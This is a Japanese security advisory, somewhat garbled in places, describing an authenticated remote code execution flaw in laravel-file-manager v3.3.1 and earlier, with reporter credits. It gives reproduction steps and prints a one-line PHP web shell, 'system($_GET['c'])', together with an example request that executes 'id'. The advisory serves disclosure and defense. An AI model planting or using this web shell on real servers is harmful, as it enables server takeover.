
laravel-file-manager v3.3.1以前における認証済みのリモートコード実行(RCE)の脆弱性により、ファイルマネージャーインターフェースにアクセスできる攻撃者がサーバー上で任意のコードを実行できる可能性があります。
laravel-file-manager v3.3.1 における認証されたリモートコード実行laravel-file-manager v3.3.1 以下における認証されたリモートコード実行(RCE)の脆弱性により、ファイルマネージャーインターフェースにアクセスできる攻撃者が、サーバー上で任意のコードを実行できます。許可された非PHP拡張子(例: .png, .pdf)のファイルに悪意のあるPHPコードを含めてアップロードし、そのファイル名を .php 拡張子に変更するか、または直接 .php ファイルを作成・編集し、そのファイルが公開URL経由でアクセスされた際にRCEを達成できます。
laravel-file-manager<?php system($_GET['c']); ?>)を含むファイル(例: shell.png)を、ファイルマネージャーのアップロードインターフェースまたはAPIを介してアップロードする。https://server-ip-address/storage/shell.php?c=id)でファイルにアクセスし、PHPペイロードを実行する。ベクター: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
🙏 謝辞
発見および報告者: Chayawat Jeamprasertboon, Thanakorn Boontem, Theethat Thamwasin